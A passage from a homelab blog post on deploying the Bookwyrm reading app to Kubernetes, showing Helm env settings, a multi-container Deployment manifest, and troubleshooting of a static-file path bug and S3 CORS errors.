</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fieldPath</span>: <span style="color:#ae81ff">status.podIP</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DEBUG</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ALLOWED_HOSTS</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm.example.com,localhost,$(POD_IP)&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SECRET_KEY</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">key</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DOMAIN</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">USE_HTTPS</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">PGPORT</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_DB</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_HOST</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_ACTIVITY_URL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379/0&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_BROKER_URL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379/1&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_BASIC_AUTH</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;$(FLOWER_USER):$(FLOWER_PASSWORD)&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_PORT</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;8888&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_HOST</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;mail.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_PORT</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_HOST_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm@example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_HOST_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mail-pw</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_SENDER_NAME</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_SENDER_DOMAIN</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">USE_S3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_STORAGE_BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">configMapKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_S3_CUSTOM_DOMAIN</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;s3-bookwyrm.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_S3_ENDPOINT_URL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ENABLE_THUMBNAIL_GENERATION</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span></code></pre></div><p>I won&rsquo;t go through all of the options, but there are a few I would like to highlight.
First, the <code>POD_IP</code> setting is important for Kubernetes probes to work. The kubelet
performs the probes against the pod&rsquo;s IP by default, and for a Django app that IP therefore
needs to be explicitly included in <code>ALLOWED_HOSTS</code>. I&rsquo;ve had a similar issue with <a href="https://docs.paperless-ngx.com/">Paperless-ngx</a>
before, which is also a Django app.</p>
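<p>One detail worth knowing about this pattern: Kubernetes only expands a <code>$(VAR)</code>
reference in an env value if the referenced variable is defined earlier in the same
<code>env</code> list; otherwise the literal string is passed through to the container.
A minimal sketch of just the two relevant entries:</p>
<pre tabindex="0"><code>env:
  # Downward API: expose the pod IP as an environment variable.
  - name: POD_IP
    valueFrom:
      fieldRef:
        fieldPath: status.podIP
  # Dependent variable: $(POD_IP) is only expanded because POD_IP is defined above.
  - name: ALLOWED_HOSTS
    value: &#34;bookwyrm.example.com,localhost,$(POD_IP)&#34;
</code></pre>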
<p>Another one is the flower auth:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_BASIC_AUTH</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;$(FLOWER_USER):$(FLOWER_PASSWORD)&#34;</span>
</span></span></code></pre></div><p>In the docker-compose example from Bookwyrm, the credentials are provided on
the command line:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">flower</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm flower --basic_auth=${FLOWER_USER}:${FLOWER_PASSWORD} --url_prefix=flower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span></code></pre></div><p>I was never able to get this approach working: for reasons I&rsquo;m unsure about, but which
probably have something to do with string escaping, I could not log in with
my credentials. So I moved them into the <code>FLOWER_BASIC_AUTH</code> environment variable instead,
at which point they immediately started working.</p>
<p>With all of that out of the way, here is the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">bookwyrm</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>      {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">bookwyrm</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;python&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;manage.py&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;runserver&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;0.0.0.0:{{ .Values.ports.web }}&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.web }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.web }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-celery-worker</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;celery&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;celerywyrm&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-l&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;info&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-Q&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;high_priority,medium_priority,low_priority,streams,images,suggested_users,email,connectors,lists,inbox,imports,import_triggered,broadcast,misc&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-celery-beat</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;celery&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;celerywyrm&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;beat&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-l&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;INFO&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--scheduler&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;django_celery_beat.schedulers:DatabaseScheduler&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-flower</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;celery&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;celerywyrm&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;flower&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--url_prefix=flower&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.flower }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>Only one comment on the above: take the resource requests with a grain of salt;
I haven&rsquo;t gotten around to looking at the metrics from the first week of
deployment yet. The values shown are still the semi-random ones I drew out of a
hat while writing the manifest.</p>
<p>At this point, I thought I was done. But that would have been too easy.</p>
<h3 id="the-power-of-css">The power of CSS</h3>
<p>The reason I knew I wasn&rsquo;t actually done was that the home page of Bookwyrm looked
like this when I first opened it:</p>
<figure>
    <img loading="lazy" src="bookwyrm-unstyled.png"
         alt="A screenshot of the homepage of my Bookwyrm instance before logging in. It is a bit...minimal, shall we say. The only styling visible is the font size of headings and the fact that those are written in bold, and the fact that links have the typical link coloring. Everything, including text boxes for username/password entry, is completely unstyled. And everything is squished on the left side of the page."/> <figcaption>
            <p>There&rsquo;s clearly something wrong.</p>
        </figcaption>
</figure>

<p>Obviously, that&rsquo;s not what it&rsquo;s supposed to look like. Those of you who are a
bit more familiar with webdev than I am will likely see immediately that there&rsquo;s
some problem with the CSS, but to me it was not quite that clear. A look into the
browser console, with its messages about the stylesheet not being found, led me to the
same conclusion. This is what I saw when looking at the page source:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">link</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;https://s3-bookwyrm.mei-home.net/css/themes/bookwyrm-light.css&#34;</span> <span style="color:#a6e22e">rel</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;stylesheet&#34;</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text/css&#34;</span> /&gt;
</span></span></code></pre></div><p>But when looking at the S3 bucket, I saw that the file was at <code>/static/...</code>.
Searching a bit, I found <a href="https://github.com/bookwyrm-social/bookwyrm/issues/3383">this bug</a>.
It was already fixed in the newest release, <code>v0.7.5</code>, but I had started out with
<code>v0.7.4</code>, as I wanted to have a chance to test my upgrade hook/script right away.</p>
<p>After updating to <code>v0.7.5</code>, I at least got some proper styling, but it still
looked like some things were missing:
<figure>
    <img loading="lazy" src="bookwyrm-cors.png"
         alt="A screenshot of the homepage of my Bookwyrm instance. This time, there&#39;s definitely some styling present. But notably, some font issues are visible, with only the glyphs with the Unicode numbers showing, not the actual symbols."/> <figcaption>
            <p>Finally styled, but still with some font glyphs clearly missing.</p>
        </figcaption>
</figure>
</p>
<p>Note especially the missing glyphs for the symbols above &ldquo;Dezentral&rdquo;, &ldquo;Freundlich&rdquo;
and &ldquo;Nichtkommerziell&rdquo; (&ldquo;decentralized&rdquo;, &ldquo;friendly&rdquo; and &ldquo;non-commercial&rdquo;). And please
forgive the partial German; I hadn&rsquo;t realized the language mix until after taking the screenshot.</p>
<p>Looking at the browser console again, I saw <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS/Errors/CORSMissingAllowOrigin">this error message</a>.
Checking a bit further, I found that I had missed a part of Bookwyrm&rsquo;s <a href="https://docs.joinbookwyrm.com/external-storage.html#cors-settings">S3 setup docs</a>.
I followed <a href="https://docs.hetzner.com/storage/object-storage/howto-protect-objects/cors/">these docs from Hetzner</a>
to apply the necessary CORS configs to my S3 bucket. I couldn&rsquo;t directly apply
